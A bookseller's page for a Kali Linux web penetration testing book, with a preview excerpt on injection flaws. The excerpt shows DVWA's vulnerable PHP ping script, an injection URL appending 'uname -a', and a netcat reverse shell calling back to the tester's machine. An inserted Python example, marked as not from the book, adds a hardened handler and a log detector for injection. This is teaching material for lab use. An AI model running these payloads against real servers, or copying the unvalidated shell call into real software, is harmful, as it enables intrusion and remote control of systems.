Web Penetration Testing with Kali Linux
eBook - ePub

Gilberto Najera-Gutierrez, Juned Ahmed Ansari

  • 426 pages
  • English
  • ePUB (mobile friendly)
  • Available on iOS & Android
About This Book

Build your defense against web attacks with Kali Linux, including command injection flaws, crypto implementation layers, and web application security holes

Key Features

  • Know how to set up your lab with Kali Linux
  • Discover the core concepts of web penetration testing
  • Get the tools and techniques you need with Kali Linux

Book Description

Web Penetration Testing with Kali Linux - Third Edition shows you how to set up a lab, helps you understand the nature and mechanics of attacking websites, and explains classical attacks in great depth. This edition is heavily updated for the latest Kali Linux changes and the most recent attacks. Kali Linux shines when it comes to client-side attacks and fuzzing in particular.

From the start of the book, you'll be given a thorough grounding in the concepts of hacking and penetration testing, and you'll see the tools used in Kali Linux that relate to web application hacking. You'll gain a deep understanding of classical SQL and command-injection flaws, and the many ways to exploit these flaws. Web penetration testing also needs a general overview of client-side attacks, which is rounded out by a long discussion of scripting and input validation flaws.

There is also an important chapter on cryptographic implementation flaws, where we discuss the most recent problems with cryptographic layers in the networking stack.

The importance of these attacks cannot be overstated, and defending against them is relevant to most internet users and, of course, penetration testers.

At the end of the book, you'll use an automated technique called fuzzing to identify flaws in a web application. Finally, you'll gain an understanding of web application vulnerabilities and the ways they can be exploited using the tools in Kali Linux.

What you will learn

  • Learn how to set up your lab with Kali Linux
  • Understand the core concepts of web penetration testing
  • Get to know the tools and techniques you need to use with Kali Linux
  • Identify the difference between hacking a web application and network hacking
  • Expose vulnerabilities present in web servers and their applications using server-side attacks
  • Understand the different techniques used to identify the flavor of web applications
  • See standard attacks such as exploiting cross-site request forgery and cross-site scripting flaws
  • Get an overview of the art of client-side attacks
  • Explore automated attacks such as fuzzing web applications

Who this book is for

Since this book sets out to cover a large number of tools and security fields, it can work as an introduction to practical security skills for beginners in security. In addition, web programmers and also system administrators would benefit from this rigorous introduction to web penetration testing. Basic system administration skills are necessary, and the ability to read code is a must.


Information

Year: 2018
ISBN: 9781788623803
Edition: 3

Detecting and Exploiting Injection-Based Flaws

According to the OWASP Top 10 2013 list (https://www.owasp.org/index.php/Top_10_2013-Top_10), the most critical flaw in web applications is the injection flaw, and it has maintained its position in the 2017 list release candidate (https://www.owasp.org/index.php/Top_10-2017_Top_10). Interactive web applications take input from the user, process it, and return the output to the client. When the application is vulnerable to an injection flaw, it accepts the input from the user without proper validation, or even without any validation at all, and still processes it. This results in actions that the application did not intend to perform. The malicious input tricks the application, forcing the underlying components to perform tasks for which the application was not programmed. In other words, an injection flaw allows the attacker to control components of the application at will.
In this chapter, we will discuss the major injection flaws in today's web applications, including tools to detect and exploit them, and how to avoid being vulnerable or to fix existing flaws. These flaws include the following:
  • Command injection flaw
  • SQL injection flaw
  • XML-based injections
  • NoSQL injections
An injection flaw is used to gain access to the underlying component to which the application is sending data, to execute some task. The following table shows the most common components used by web applications that are often targeted by an injection attack when the input from the user is not sanitized by the application:
Components                  Injection flaws
Operating system            Command injection
Database                    SQL/NoSQL injection
Web browser / client        Cross-Site Scripting
LDAP directory              LDAP injection
XML                         XPATH / XML External Entity injection

Command injection

Web applications, which are dynamic in nature, may use scripts to invoke some functionality within the operating system on the web server to process the input received from the user. An attacker may try to get this input processed at the command line by circumventing the input validation filters implemented by the application. Command injection usually invokes commands on the same web server, but it is possible that the command can be executed on a different server, depending on the architecture of the application.
Let's take a look at a simple code snippet that is vulnerable to a command injection flaw, taken from DVWA's command injection exercise. It is a very simple script that receives an IP address and sends pings (ICMP packets) to that address:
<?php
$target = $_REQUEST[ 'ip' ];                    // user-supplied value, used with no validation
$cmd = shell_exec( 'ping -c 3 ' . $target );    // concatenated straight into a shell command
$html .= '<pre>'.$cmd.'</pre>';                 // command output is returned to the client
echo $html;
?>
As you can see, there is no input validation before accepting the ip parameter from the user, which makes this code vulnerable to a command injection attack. To log in to DVWA, the default credentials are admin/admin.
A malicious user might use the following request to pipe in additional commands, which the application would accept without raising an exception:
http://server/page.php?ip=127.0.0.1;uname -a
The application takes the value of the user input from the client without validation and concatenates it to the ping -c 3 command in order to build the final command that is run on the web server. The response from the server is shown in the following screenshot. The version of the underlying OS is displayed along with the result of pinging the given address as the application failed to validate the user input:
The additional command injected will run using the privileges of the web server. Most web servers nowadays run with restricted privileges, but even with limited rights, the attacker can exploit and steal significant information.
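The fix for the snippet above is to treat the ip parameter as data, never as part of a command: accept only a literal IP address and hand it to ping as a separate argument with no shell involved. The following is an added Python example, not code from the book or from DVWA; it shows the hardened counterpart of the handler together with a check that flags the same injection pattern in web-server access logs (the log format and the sample lines are constructed here).

```python
import ipaddress
import re
from urllib.parse import unquote_plus, urlsplit


def is_safe_target(target: str) -> bool:
    """True only when `target` is a bare IPv4/IPv6 literal."""
    try:
        ipaddress.ip_address(target.strip())
        return True
    except ValueError:
        return False


def build_ping_argv(target: str) -> list:
    """Hardened counterpart of the DVWA handler: returns the argv list for
    subprocess.run(argv) with no shell, or raises ValueError, so a value
    such as '127.0.0.1;uname -a' never reaches any command interpreter."""
    if not is_safe_target(target):
        raise ValueError("ip parameter is not an IP address: %r" % target)
    return ["ping", "-c", "3", target.strip()]


# Characters that only matter if the value is meant to be read by a shell.
_SHELL_META = re.compile(r"[;&|`$<>\n]")


def _query_params(query: str) -> dict:
    """Split only on '&' so a ';' inside a value stays in that value
    (some parse_qs versions also split on ';' and would hide it)."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key:
            params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def flag_command_injection(log_line: str, param: str = "ip") -> bool:
    """Flag an access-log line whose `param` value is not an IP address and
    carries shell metacharacters. Constructed log format (an assumption):
    '<client> "<METHOD> <path?query> HTTP/x.y" <status>'."""
    m = re.search(r'"[A-Z]+ (\S+) HTTP/\d\.\d"', log_line)
    if not m:
        return False
    values = _query_params(urlsplit(m.group(1)).query).get(param, [])
    return any(not is_safe_target(v) and _SHELL_META.search(v) for v in values)


# Constructed sample lines (not taken from the book).
SAMPLE_LOG = [
    '10.0.0.5 "GET /page.php?ip=127.0.0.1 HTTP/1.1" 200',
    '10.0.0.9 "GET /page.php?ip=127.0.0.1;uname%20-a HTTP/1.1" 200',
    '10.0.0.9 "GET /page.php?ip=127.0.0.1%7Cid HTTP/1.1" 200',
]
```

Run `[flag_command_injection(l) for l in SAMPLE_LOG]` to see only the second and third lines flagged; a hostname such as `localhost` is rejected by `is_safe_target` but not flagged, since it carries no shell metacharacters.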
Command injection can be used to make the server download and execute malicious files by injecting the wget commands, or to gain a remote shell to the server, as demonstrated in the following example.
First, set up a listener in Kali Linux. Netcat has a very simple way of doing this:
nc -lvp 12345 
Kali Linux is now set to listen for a connection on port 12345. Next, inject the following command into the vulnerable server:
nc.traditional -e /bin/bash 10.7.7.4 12345 
On some modern Linux systems, the original Netcat has been replaced by a version that doesn't include some options that may have posed a security risk, such as -e, which allows the execution of commands upon connection. These systems often include the traditional version of Netcat in a command called nc.traditional. When trying to use Netcat to gain access to a remote system, try both options.
Notice that 10.7.7.4 is the IP address of the Kali machine in the example, and 12345 is the TCP port listening for the connection. After sending the request, you should receive the connection on your Kali Linux machine and be able to issue commands in a noninteractive shell:
A noninteractive shell allows you to execute commands and see the results, but not interact with the commands nor see the error output, such as when using a text editor.

Identifying parameters to inject data

When you are testing a web application for command injection flaws, and you have confirmed that the application is interacting with the command line of the underlying OS, the next step is to manipulate and probe the different parameters in the application and view their responses. The following parameters should be tested for command injection flaws as the application may be using one of these parameters to build a command back on the web server:
  • GET: With this method, input parameters are sent in URLs. In the example shown earlier, the input from the client was passed to the server using the GET method and was vulnerable to a command injection flaw. Any user-controlled parameter sent using the GET method request should be tested.
  • POST: In this method, the input parameters are sent in the HTTP body. Similar to the input being passed using the GET method; data taken from the end user can also be passed using the POST method in the body of the HTTP request. This could then be used by the web applic...
